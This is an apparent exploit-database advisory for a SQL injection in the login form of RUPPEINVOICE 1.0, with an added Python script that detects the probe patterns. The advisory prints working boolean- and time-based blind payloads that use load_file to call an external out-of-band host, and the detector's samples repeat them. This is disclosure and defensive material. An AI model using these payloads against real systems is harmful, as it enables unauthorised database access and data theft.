RUPPEINVOICE 1.0 SQL Injection
RUPPEINVOICE version 1.0 suffers from a remote SQL injection vulnerability.
## Title: RUPPEINVOICE-1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 03/09/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The username parameter appears to be vulnerable to SQL injection attacks. The payload `'+(select load_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+'` was submitted in the username parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can get all information from the system by using this vulnerability!

STATUS: HIGH - Vulnerability

[+]Payload:
```mysql
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: username=zBuveHif'+(select load_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+'' OR NOT 6356=6356 AND 'Eocq'='Eocq&password=g7J!m3v!W2&login=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=zBuveHif'+(select load_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+'' AND (SELECT 4013 FROM (SELECT(SLEEP(7)))BnHP) AND 'bCQt'='bCQt&password=g7J!m3v!W2&login=
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/RUPPEINVOICE-1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/03/ruppeinvoice-10-multiple-sqli.html)

## Time spent:
00:35:00
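
Added example, not part of the original advisory: a Python check that flags the three probe patterns visible in the payloads above (load_file with a UNC path, SLEEP(), and an OR/AND n=n tautology) in a form-encoded login POST body. The rule names, the function name, the sample bodies and the host `oast.example.invalid` are constructed for illustration; matching like this supports detection and triage, while the fix itself is a parameterized query in the login handler.

```python
import re
from urllib.parse import parse_qs, urlencode

# Indicators derived from the advisory's payloads against the login form.
RULES = {
    # load_file() given a UNC path (\\host\share) triggers an outbound lookup.
    "load_file_unc": re.compile(r"load_file\s*\(\s*['\"]\\{2,}", re.I),
    # Time-based blind probe: SLEEP(n) inside the submitted value.
    "sleep_call": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
    # Boolean-based blind probe: quote, then OR/AND [NOT] n=n with equal numbers.
    "boolean_probe": re.compile(
        r"'\s*(?:or|and)\s+(?:not\s+)?(\d+)\s*=\s*\1\b", re.I),
}


def inspect_login_body(body, fields=("username", "password")):
    """Return sorted 'field:rule' hits for a form-encoded POST body."""
    params = parse_qs(body, keep_blank_values=True)  # also URL-decodes values
    hits = set()
    for field in fields:
        for value in params.get(field, []):
            for name, rx in RULES.items():
                if rx.search(value):
                    hits.add(f"{field}:{name}")
    return sorted(hits)


# Constructed sample bodies (placeholder host, not the one from the advisory).
UNC = r"'+(select load_file('\\\\oast.example.invalid\\fmd'))+'"
SAMPLES = {
    "benign": urlencode({"username": "o'brien", "password": "pw", "login": ""}),
    "boolean": urlencode({
        "username": "x" + UNC + "' OR NOT 6356=6356 AND 'a'='a",
        "password": "pw", "login": ""}),
    "time": urlencode({
        "username": "x" + UNC + "' AND (SELECT 4013 FROM (SELECT(SLEEP(7)))t) AND 'a'='a",
        "password": "pw", "login": ""}),
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, inspect_login_body(body))
```
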